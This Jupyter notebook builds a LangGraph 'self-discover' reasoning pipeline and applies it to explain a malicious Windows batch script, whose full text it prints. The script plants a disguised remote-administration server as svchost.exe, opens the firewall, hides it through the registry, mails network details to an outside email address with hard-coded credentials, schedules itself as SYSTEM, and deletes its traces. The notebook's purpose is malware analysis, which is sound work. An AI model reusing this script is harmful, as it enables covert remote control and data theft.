In [None]:
!pip install langchain langchain_openai langchainhub langgraph

In [17]:
import os
os.environ["OPENAI_API_KEY"] = "sk-XXX"

In [18]:
from langchain_openai import ChatOpenAI
model = ChatOpenAI(temperature=0, model="gpt-4-turbo-preview")
from langchain import hub
from langchain_core.prompts import PromptTemplate

In [19]:
select_prompt = hub.pull("hwchase17/self-discovery-select")
select_prompt.pretty_print()

Select several reasoning modules that are crucial to utilize in order to solve the given task:

All reasoning module descriptions:
{reasoning_modules}

Task: {task_description}

Select several modules are crucial for solving the task above:



In [20]:
adapt_prompt = hub.pull("hwchase17/self-discovery-adapt")
adapt_prompt.pretty_print()


Rephrase and specify each reasoning module so that it better helps solving the task:

SELECTED module descriptions:
{selected_modules}

Task: {task_description}

Adapt each reasoning module description to better solve the task:



In [22]:
structured_prompt = hub.pull("hwchase17/self-discovery-structure")
structured_prompt.pretty_print()

Operationalize the reasoning modules into a step-by-step reasoning plan in JSON format:

Here's an example:

Example task:

If you follow these instructions, do you return to the starting point? Always face forward. Take 1 step backward. Take 9 steps left. Take 2 steps backward. Take 6 steps forward. Take 4 steps forward. Take 4 steps backward. Take 3 steps right.

Example reasoning structure:

{
    "Position after instruction 1":
    "Position after instruction 2":
    "Position after instruction n":
    "Is final position the same as starting position":
}

Adapted module description:
{adapted_modules}

Task: {task_description}

Implement a reasoning structure for solvers to follow step-by-step and arrive at correct answer.

Note: do NOT actually arrive at a conclusion in this pass. Your job is to generate a PLAN so that in the future you can fill it out and arrive at the correct conclusion for tasks like this


In [24]:
reasoning_prompt = hub.pull("hwchase17/self-discovery-reasoning")
reasoning_prompt.pretty_print()

Follow the step-by-step reasoning plan in JSON to correctly solve the task. Fill in the values following the keys by reasoning specifically about the task given. Do not simply rephrase the keys.
    
Reasoning Structure:
{reasoning_structure}

Task: {task_description}
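
Each of the four prompts above exposes `{placeholder}` variables that are filled from the workflow state at call time. The sketch below illustrates that substitution with plain `str.format` as a stand-in for the hub prompt object; the template text is copied from the select prompt printed earlier, and `render_select_prompt` is a hypothetical helper name, not part of LangChain.

```python
# Plain-Python stand-in for how a prompt template fills its placeholders.
# The template text mirrors the select prompt printed earlier in this notebook.
SELECT_TEMPLATE = (
    "Select several reasoning modules that are crucial to utilize "
    "in order to solve the given task:\n\n"
    "All reasoning module descriptions:\n{reasoning_modules}\n\n"
    "Task: {task_description}\n\n"
    "Select several modules are crucial for solving the task above:\n"
)


def render_select_prompt(reasoning_modules: str, task_description: str) -> str:
    """Substitute both placeholders; str.format raises KeyError if one is missing."""
    return SELECT_TEMPLATE.format(
        reasoning_modules=reasoning_modules,
        task_description=task_description,
    )


rendered = render_select_prompt(
    "1. How could I devise an experiment to help solve that problem?",
    "Explain what this script does.",
)
print(rendered)
```

The same idea applies to the adapt, structure, and reasoning prompts: the key names in the input dict must match the placeholder names exactly.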


In [28]:
from typing import TypedDict, Optional

class SelfDiscoverState(TypedDict):
    reasoning_modules: str
    task_description: str
    selected_modules: Optional[str]
    adapted_modules: Optional[str]
    reasoning_structure: Optional[str]
    answer: Optional[str]

In [37]:
from langchain_core.output_parsers import StrOutputParser

def select(inputs):
    select_chain = select_prompt | model | StrOutputParser()
    return {"selected_modules": select_chain.invoke(inputs)}

def adapt(inputs):
    adapt_chain = adapt_prompt | model | StrOutputParser()
    return {"adapted_modules": adapt_chain.invoke(inputs)}

def structure(inputs):
    structure_chain = structured_prompt | model | StrOutputParser()
    return {"reasoning_structure": structure_chain.invoke(inputs)}

def reason(inputs):
    reasoning_chain = reasoning_prompt | model | StrOutputParser()
    return {"answer": reasoning_chain.invoke(inputs)}

In [38]:
from langgraph.graph import StateGraph, END

graph = StateGraph(SelfDiscoverState)
graph.add_node("select", select)
graph.add_node("adapt", adapt)
graph.add_node("structure", structure)
graph.add_node("reason", reason)
graph.add_edge("select", "adapt")
graph.add_edge("adapt", "structure")
graph.add_edge("structure", "reason")
graph.add_edge("reason", END)
graph.set_entry_point("select")
app = graph.compile()
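
The graph above is a straight line: select, adapt, structure, reason. Each node returns only the key it produces, and that partial update is merged into the shared state before the next node runs. The following is a minimal plain-Python sketch of that behavior, not LangGraph's actual implementation; `run_linear`, `fake_select`, and `fake_adapt` are hypothetical names, and the stub nodes stand in for the LLM-backed functions.

```python
from typing import Callable, Dict, Iterator, List, Tuple

State = Dict[str, str]
Node = Callable[[State], State]


def run_linear(nodes: List[Tuple[str, Node]], state: State) -> Iterator[Dict[str, State]]:
    """Run nodes in order, merging each partial update into the shared state."""
    state = dict(state)  # copy so the caller's dict is not mutated
    for name, fn in nodes:
        update = fn(state)      # node sees everything produced so far
        state.update(update)    # partial update overwrites/extends the state
        yield {name: update}    # one chunk per node, keyed by node name


# Hypothetical stub nodes standing in for the LLM-backed select/adapt steps.
def fake_select(s: State) -> State:
    return {"selected_modules": "picked from: " + s["reasoning_modules"]}


def fake_adapt(s: State) -> State:
    return {"adapted_modules": "adapted: " + s["selected_modules"]}


chunks = list(run_linear(
    [("select", fake_select), ("adapt", fake_adapt)],
    {"task_description": "demo task", "reasoning_modules": "m1, m2"},
))
print(chunks)
```

Because `fake_adapt` reads `selected_modules`, it only works after `fake_select` has run, which is the same ordering constraint the edges in the graph encode.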

In [39]:
reasoning_modules = [
    "1. How could I devise an experiment to help solve that problem?",
    "2. Make a list of ideas for solving this problem, and apply them one by one to the problem to see if any progress can be made.",
    # "3. How could I measure progress on this problem?",
    "4. How can I simplify the problem so that it is easier to solve?",
    "5. What are the key assumptions underlying this problem?",
    "6. What are the potential risks and drawbacks of each solution?",
    "7. What are the alternative perspectives or viewpoints on this problem?",
    "8. What are the long-term implications of this problem and its solutions?",
    "9. How can I break down this problem into smaller, more manageable parts?",
    "10. Critical Thinking: This style involves analyzing the problem from different perspectives, questioning assumptions, and evaluating the evidence or information available. It focuses on logical reasoning, evidence-based decision-making, and identifying potential biases or flaws in thinking.",
    "11. Try creative thinking, generate innovative and out-of-the-box ideas to solve the problem. Explore unconventional solutions, thinking beyond traditional boundaries, and encouraging imagination and originality.",
    # "12. Seek input and collaboration from others to solve the problem. Emphasize teamwork, open communication, and leveraging the diverse perspectives and expertise of a group to come up with effective solutions.",
    "13. Use systems thinking: Consider the problem as part of a larger system and understanding the interconnectedness of various elements. Focuses on identifying the underlying causes, feedback loops, and interdependencies that influence the problem, and developing holistic solutions that address the system as a whole.",
    "14. Use Risk Analysis: Evaluate potential risks, uncertainties, and tradeoffs associated with different solutions or approaches to a problem. Emphasize assessing the potential consequences and likelihood of success or failure, and making informed decisions based on a balanced analysis of risks and benefits.",
    # "15. Use Reflective Thinking: Step back from the problem, take the time for introspection and self-reflection. Examine personal biases, assumptions, and mental models that may influence problem-solving, and being open to learning from past experiences to improve future approaches.",
    "16. What is the core issue or problem that needs to be addressed?",
    "17. What are the underlying causes or factors contributing to the problem?",
    "18. Are there any potential solutions or strategies that have been tried before? If yes, what were the outcomes and lessons learned?",
    "19. What are the potential obstacles or challenges that might arise in solving this problem?",
    "20. Are there any relevant data or information that can provide insights into the problem? If yes, what data sources are available, and how can they be analyzed?",
    "21. Are there any stakeholders or individuals who are directly affected by the problem? What are their perspectives and needs?",
    "22. What resources (financial, human, technological, etc.) are needed to tackle the problem effectively?",
    "23. How can progress or success in solving the problem be measured or evaluated?",
    "24. What indicators or metrics can be used?",
    "25. Is the problem a technical or practical one that requires a specific expertise or skill set? Or is it more of a conceptual or theoretical problem?",
    "26. Does the problem involve a physical constraint, such as limited resources, infrastructure, or space?",
    "27. Is the problem related to human behavior, such as a social, cultural, or psychological issue?",
    "28. Does the problem involve decision-making or planning, where choices need to be made under uncertainty or with competing objectives?",
    "29. Is the problem an analytical one that requires data analysis, modeling, or optimization techniques?",
    "30. Is the problem a design challenge that requires creative solutions and innovation?",
    "31. Does the problem require addressing systemic or structural issues rather than just individual instances?",
    "32. Is the problem time-sensitive or urgent, requiring immediate attention and action?",
    "33. What kinds of solution typically are produced for this kind of problem specification?",
    "34. Given the problem specification and the current best solution, have a guess about other possible solutions.",
    "35. Let’s imagine the current best solution is totally wrong, what other ways are there to think about the problem specification?",
    "36. What is the best way to modify this current best solution, given what you know about these kinds of problem specification?",
    "37. Ignoring the current best solution, create an entirely new solution to the problem.",
    # "38. Let’s think step by step."
    "39. Let’s make a step by step plan and implement it with good notation and explanation.",
]

In [41]:
reasoning_modules_str = "\n".join(reasoning_modules)
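
Python silently concatenates adjacent string literals, so a missing comma in a long list like `reasoning_modules` merges two entries into one without raising an error. The sketch below is one possible sanity check, assuming every entry starts with a single `N. ` prefix as in the list above; `find_merged_entries` is a hypothetical helper and the heuristic would misfire on entries that legitimately contain a second numbered prefix.

```python
import re

# Matches a numbered prefix such as "12. " that is not glued to a preceding word character.
NUMBER_PREFIX = re.compile(r"(?<!\w)\d+\. ")


def find_merged_entries(modules):
    """Return entries containing more than one numbered prefix (likely a missing comma)."""
    return [m for m in modules if len(NUMBER_PREFIX.findall(m)) > 1]


sample = [
    "1. First module.",
    "2. Second module."   # comma missing here on purpose
    "3. Third module.",
    "4. Fourth module.",
]

merged = find_merged_entries(sample)
print(len(sample), merged)
```

Running `find_merged_entries(reasoning_modules)` before joining the list gives an empty result when every entry is properly separated.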

# Applying to malicious code explanation

In [None]:
import json

# NOTE: `yasin` is not defined anywhere in this notebook; define it before running this cell.
print(json.dumps(yasin, indent=2))

In [43]:

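# Raw string so backslashes in the pasted bytes repr (e.g. \v2.0, \r_server) are not treated as escapes.
task_example = r"""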
As a professional security analyst, 
You will provide step-by-step analysis of the malicious batch script that user provided and explain its malicious intent. 
By breaking down the code snippet and providing partial segments for each specific analysis, 
You'll uncover the potential harm it can cause.

This is body of malicious batch script:
<code>
b'\r\n\r\ncmdow @ /HID\r\n\r\n\r\ncopy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"\r\ncopy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"\r\ncopy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll\r\ncopy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" \r\ncopy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"\r\ncopy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"\r\n\r\nnetsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE\r\n\r\nREG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f\r\nREG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f\r\n\r\n"%SYSTEMROOT%/svchost.exe" /install /silence\r\n"%SYSTEMROOT%/svchost.exe" /start\r\n\r\n%SYSTEMROOT%/system32/blat.exe -install -server smtp.yandex.ru -port 587 -f railpunk@yandex.ru -u Railpunk -pw 462855\r\n\r\nipconfig /all > %systemroot%/system32/ip.txt\r\n\r\nblat.exe %systemroot%/system32/ip.txt -to ypyachka-jkjkj@yandex.ru. \r\n\r\nschtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat\r\n\r\n\r\ndel cmdow.exe\r\ndel blat.exe\r\ndel blat.lib\r\ndel blat.dll\r\ndel raddrv.dll\r\ndel admdll.dll\r\ndel svchost.exe\r\ndel install.bat'
</code>

explain harmful intent of malicious batch script
"""


In [None]:
import json

results = []
for s in app.stream(
    {"task_description": task_example, "reasoning_modules": reasoning_modules_str}
):
    # Each streamed chunk maps a node name to that node's output.
    results.append(s)
    # print(json.dumps(s, indent=2, default=str))
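
The cells that follow index `results` by position (`results[0]['select']`, `results[1]['adapt']`, and so on), which depends on the order in which chunks arrive. A small sketch of an alternative, assuming each chunk is a dict keyed by node name as those cells imply; `collect_by_node` and `example_results` are hypothetical and the values are placeholders, not real model output.

```python
def collect_by_node(chunks):
    """Flatten a list of {node_name: output} dicts into one dict keyed by node name."""
    by_node = {}
    for chunk in chunks:
        by_node.update(chunk)
    return by_node


# Placeholder chunks in the shape the later cells index into.
example_results = [
    {"select": {"selected_modules": "modules 9, 10"}},
    {"adapt": {"adapted_modules": "adapted 9, 10"}},
    {"structure": {"reasoning_structure": "{}"}},
    {"reason": {"answer": "final answer"}},
]

by_node = collect_by_node(example_results)
print(by_node["reason"]["answer"])
```

With this shape, `by_node['select']['selected_modules']` reads the same value as `results[0]['select']['selected_modules']` without relying on list position.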

In [52]:
# SELECT
from IPython.display import display, Markdown, Latex
display(Markdown(results[0]['select']['selected_modules']))

To effectively analyze and explain the harmful intent of the provided malicious batch script, several reasoning modules are crucial. These modules will help break down the script, understand its components, and assess its potential impact. The selected modules are:

1. **Critical Thinking (10)**: This module is essential for analyzing the script from different perspectives, questioning the intentions behind each command, and evaluating the potential harm each segment could cause. It involves logical reasoning and evidence-based decision-making.

2. **Systems Thinking (13)**: Understanding how this script interacts with the larger system (in this case, a computer's operating system and network) is crucial. This module helps in identifying the underlying causes and interdependencies between the script's actions and the system's vulnerabilities it exploits.

3. **Risk Analysis (14)**: Evaluating the potential risks and consequences associated with the script's actions is vital. This includes assessing the likelihood of success for each malicious action and the potential damage or security breach it could cause.

4. **Breaking Down the Problem (9)**: The script should be broken down into smaller, more manageable parts for specific analysis. This involves dissecting each command and understanding its function and potential impact individually.

5. **Identifying Core Issues (16)**: Identifying the core malicious intents and actions within the script that need to be addressed. This includes recognizing actions such as copying malicious files, modifying system settings, and executing unauthorized commands.

6. **Understanding Technical Details (25)**: Given that the task involves analyzing a batch script, a technical understanding of batch scripting, system commands, and their implications is necessary. This includes knowledge of system directories, executable files, and network commands.

7. **Analyzing Potential Obstacles (19)**: Considering potential obstacles in analyzing the script, such as obfuscated code or commands that may not have immediate apparent effects.

8. **Data Analysis (29)**: Analyzing the data flow within the script, such as the creation of files, gathering of system information, and the unauthorized sending of this information to external parties.

9. **Step-by-Step Plan (39)**: Creating a step-by-step plan to analyze each segment of the script, explaining its function, and uncovering its malicious intent. This involves methodically going through the script, providing analysis for each command, and summarizing the potential harm.

By utilizing these reasoning modules, a comprehensive analysis of the malicious batch script can be conducted, revealing its harmful intent and potential impact on systems it targets.

In [54]:
# ADAPT
from IPython.display import display, Markdown, Latex
display(Markdown(results[1]['adapt']['adapted_modules']))

To effectively dissect and elucidate the malevolent objectives of the provided malicious batch script, it is imperative to employ a suite of refined reasoning modules. These modules are tailored to meticulously analyze the script's components, comprehend its mechanics, and gauge its potential ramifications. The refined modules for this task are as follows:

1. **Enhanced Critical Analysis (10)**: This module is pivotal for a deep dive into the script's architecture, scrutinizing the purpose behind each command, and gauging the potential threats each segment may unleash. It leverages logical scrutiny and evidence-backed conclusions to dissect the script's intent.

2. **Advanced Systems Interaction Understanding (13)**: This module is key to comprehending how the script manipulates and interacts with broader system components, such as the operating system and network infrastructure. It aids in pinpointing the script's exploitation of system vulnerabilities through a thorough examination of cause-and-effect relationships and system interdependencies.

3. **Comprehensive Risk Evaluation (14)**: This module is essential for a detailed assessment of the risks and repercussions emanating from the script's execution. It involves a thorough analysis of the probability of each malicious action's success and the extent of damage or security compromise it could instigate.

4. **Segmented Problem Decomposition (9)**: This module advocates for breaking down the script into smaller, more digestible segments for targeted analysis. It entails a command-by-command dissection to understand each command's functionality and its potential threat landscape individually.

5. **Malicious Intent Identification (16)**: This module focuses on pinpointing the script's primary malevolent objectives and actions that warrant immediate attention. It involves recognizing actions such as unauthorized file duplication, system configuration alterations, and execution of unsanctioned commands.

6. **Technical Detail Mastery (25)**: Given the task's nature, a profound technical grasp of batch scripting, system command functionalities, and their implications is indispensable. This encompasses an understanding of system directories, executable files, and network-related commands.

7. **Obstacle Analysis (19)**: This module considers potential hurdles in the script analysis, including code obfuscation or commands with delayed or hidden effects, facilitating a more thorough examination.

8. **Data Flow Examination (29)**: This module involves a meticulous analysis of the script's data manipulation processes, such as file creation, system information harvesting, and unauthorized data transmission to external entities.

9. **Structured Analytical Methodology (39)**: This module outlines a systematic approach to dissect each script segment, elucidate its functionality, and unveil its malevolent purposes. It involves a stepwise traversal of the script, offering detailed command analysis and summarizing the potential threats posed.

By leveraging these refined reasoning modules, a comprehensive and detailed analysis of the malicious batch script can be achieved, uncovering its detrimental intentions and the potential hazards it poses to targeted systems.

In [57]:
# IMPLEMENT
from IPython.display import display, Markdown, Latex
display(Markdown(results[2]['structure']['reasoning_structure']))

```json
{
  "Analysis Plan": [
    {
      "Step": 1,
      "Module": "Enhanced Critical Analysis",
      "Action": "Identify and list all commands in the script.",
      "Purpose": "To understand the structure and components of the script."
    },
    {
      "Step": 2,
      "Module": "Segmented Problem Decomposition",
      "Action": "Break down the script into segments based on functionality.",
      "Purpose": "To simplify the analysis by focusing on smaller parts."
    },
    {
      "Step": 3,
      "Module": "Technical Detail Mastery",
      "Action": "Research each command's functionality and potential uses.",
      "Purpose": "To gain a deep understanding of what each script segment does."
    },
    {
      "Step": 4,
      "Module": "Advanced Systems Interaction Understanding",
      "Action": "Analyze how the script interacts with system components.",
      "Purpose": "To identify how the script exploits system vulnerabilities."
    },
    {
      "Step": 5,
      "Module": "Malicious Intent Identification",
      "Action": "Identify actions within the script that have malicious intent.",
      "Purpose": "To pinpoint the primary malevolent objectives of the script."
    },
    {
      "Step": 6,
      "Module": "Comprehensive Risk Evaluation",
      "Action": "Assess the risks associated with each identified malicious action.",
      "Purpose": "To evaluate the potential damage or security compromise."
    },
    {
      "Step": 7,
      "Module": "Obstacle Analysis",
      "Action": "Identify potential hurdles in analyzing the script.",
      "Purpose": "To anticipate and address challenges such as code obfuscation."
    },
    {
      "Step": 8,
      "Module": "Data Flow Examination",
      "Action": "Analyze the script's data manipulation processes.",
      "Purpose": "To understand unauthorized data transmission or file manipulation."
    },
    {
      "Step": 9,
      "Module": "Structured Analytical Methodology",
      "Action": "Summarize the findings from each step and conclude the analysis.",
      "Purpose": "To compile a comprehensive report on the script's harmful intent."
    }
  ]
}
```
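
The reasoning structure comes back as a string wrapped in a Markdown code fence, so it has to be unwrapped before it can be used as data. The sketch below shows one way to do that with the standard library; `extract_json_block` is a hypothetical helper, and it assumes the model returns at most one fenced block containing valid JSON, which is not guaranteed.

```python
import json
import re

FENCE = "`" * 3  # built programmatically to avoid a literal fence inside this example

# Optional "json" language tag, then lazily capture everything up to the closing fence.
FENCED_BLOCK = re.compile(
    re.escape(FENCE) + r"(?:json)?\s*(.*?)" + re.escape(FENCE),
    flags=re.DOTALL,
)


def extract_json_block(text: str):
    """Parse the first fenced block in text, or the whole text if no fence is found."""
    match = FENCED_BLOCK.search(text)
    payload = match.group(1) if match else text
    return json.loads(payload)  # raises json.JSONDecodeError on malformed output


sample_output = (
    FENCE + "json\n"
    '{"Analysis Plan": [{"Step": 1, "Module": "Enhanced Critical Analysis"}]}\n'
    + FENCE
)

plan = extract_json_block(sample_output)
print(plan["Analysis Plan"][0]["Module"])
```

Applied to the notebook, the input would be `results[2]['structure']['reasoning_structure']`.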

In [60]:
# APPLY ONTO SPECIFIC TASK INSTANCE
from IPython.display import display, Markdown, Latex
display(Markdown(results[3]['reason']['answer']))

Based on the provided malicious batch script, let's follow the reasoning structure to analyze its components and uncover its harmful intent.

### Step 1: Identify and list all commands in the script.

- `cmdow @ /HID`
- `copy /y`
- `netsh firewall add allowedprogram`
- `REG ADD`
- `"%SYSTEMROOT%/svchost.exe" /install /silence`
- `"%SYSTEMROOT%/svchost.exe" /start`
- `%SYSTEMROOT%/system32/blat.exe -install`
- `ipconfig /all > %systemroot%/system32/ip.txt`
- `blat.exe %systemroot%/system32/ip.txt -to`
- `schtasks /create`
- `del`

### Step 2: Break down the script into segments based on functionality.

1. **Hiding the Command Window**: `cmdow @ /HID`
2. **Copying Files**: Multiple `copy /y` commands to copy executables and libraries to system directories.
3. **Firewall Configuration**: `netsh firewall add allowedprogram`
4. **Registry Modifications**: Multiple `REG ADD` commands to modify system settings.
5. **Executing Malicious Software**: Commands to install and start a malicious `svchost.exe`.
6. **Email Configuration and Data Exfiltration**: Using `blat.exe` for email setup and sending system information.
7. **Scheduling Tasks**: `schtasks /create` to persistently execute tasks.
8. **Cleanup**: Multiple `del` commands to remove traces of the tools used.

### Step 3: Research each command's functionality and potential uses.

- `cmdow @ /HID`: Hides the command window to avoid detection.
- `copy /y`: Copies files, potentially malicious, to system directories to maintain persistence.
- `netsh firewall add allowedprogram`: Modifies the firewall to allow the malicious `svchost.exe` through.
- `REG ADD`: Modifies registry settings to disable security notifications and change service display names to hide malicious activities.
- `"%SYSTEMROOT%/svchost.exe"`: Executes a malicious copy of `svchost.exe`, masquerading as a legitimate system process.
- `blat.exe`: Command-line email tool used here to send system information to an attacker.
- `ipconfig /all > %systemroot%/system32/ip.txt`: Dumps system IP configuration for exfiltration.
- `schtasks /create`: Creates scheduled tasks for repeated execution of malicious activities.
- `del`: Deletes files to cover tracks.

### Step 4: Analyze how the script interacts with system components.

The script interacts with system components by:
- Hiding its execution window to avoid user detection.
- Copying malicious files into system directories to ensure they're executed from trusted locations.
- Modifying firewall and registry settings to bypass security measures and hide its presence.
- Executing a malicious version of `svchost.exe` to perform unauthorized activities under the guise of a legitimate process.
- Using scheduled tasks for persistence, ensuring the malicious activities continue even after reboot.

### Step 5: Identify actions within the script that have malicious intent.

- Hiding the command window.
- Copying and executing malicious files.
- Modifying firewall and registry settings to weaken security.
- Exfiltrating system information via email.
- Creating persistent scheduled tasks for ongoing exploitation.

### Step 6: Assess the risks associated with each identified malicious action.

- **Hiding Execution**: Avoids detection, allowing the script to operate unnoticed.
- **Copying and Executing Malicious Files**: Can lead to unauthorized control, data theft, or further malware infection.
- **Modifying Security Settings**: Weakens the system's defenses, making it more vulnerable to attacks.
- **Data Exfiltration**: Compromises privacy and could lead to targeted phishing or further attacks.
- **Persistent Tasks**: Ensures the malware remains active, causing continuous harm.

### Step 7: Identify potential hurdles in analyzing the script.

- Code obfuscation techniques like renaming malicious files to mimic legitimate ones.
- The use of legitimate tools (e.g., `blat.exe`) for malicious purposes, complicating intent assessment.
- The script's ability to delete itself and other tools used, erasing evidence of its presence.

### Step 8: Analyze the script's data manipulation processes.

- Collects system IP configuration data.
- Configures an email client for unauthorized use.
- Sends collected data to an attacker's email, leading to unauthorized data access.

### Step 9: Summarize the findings from each step and conclude the analysis.

The malicious batch script is designed to operate stealthily by hiding its window, copying malicious files into system directories, and modifying system settings to avoid detection and weaken security. It installs a malicious version of `svchost.exe` to perform unauthorized activities and uses `blat.exe` to exfiltrate system information to an attacker. The script sets up persistent tasks for ongoing exploitation and attempts to cover its tracks by deleting the tools used. The primary harmful intents are unauthorized system control, data theft, and ensuring persistence to facilitate continuous exploitation.
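
Step 1 of the plan above (listing the commands in the script) can also be approximated programmatically as a cross-check on the model's answer. This is a rough sketch under simplifying assumptions: one command per line, the command is the first token, and a leading quoted path counts as a single token. `first_token` and `list_commands` are hypothetical helpers, and `excerpt` reuses a few lines from the script in the task.

```python
def first_token(line: str) -> str:
    """Return the first token of a batch line, treating a leading quoted path as one token."""
    line = line.strip()
    if line.startswith('"'):
        end = line.find('"', 1)
        return line[1:end] if end != -1 else line[1:]
    return line.split(None, 1)[0]


def list_commands(script: str):
    """List distinct leading commands in order of first appearance, lowercased."""
    seen = []
    for raw in script.splitlines():
        if not raw.strip():
            continue  # skip blank lines
        cmd = first_token(raw).lower()
        if cmd not in seen:
            seen.append(cmd)
    return seen


excerpt = (
    "cmdow @ /HID\r\n"
    'copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"\r\n'
    'copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"\r\n'
    "ipconfig /all > %systemroot%/system32/ip.txt\r\n"
    "del cmdow.exe\r\n"
    "del blat.exe\r\n"
)

commands = list_commands(excerpt)
print(commands)
```

A list like this only names the commands; interpreting what each one does still relies on the reasoning steps above.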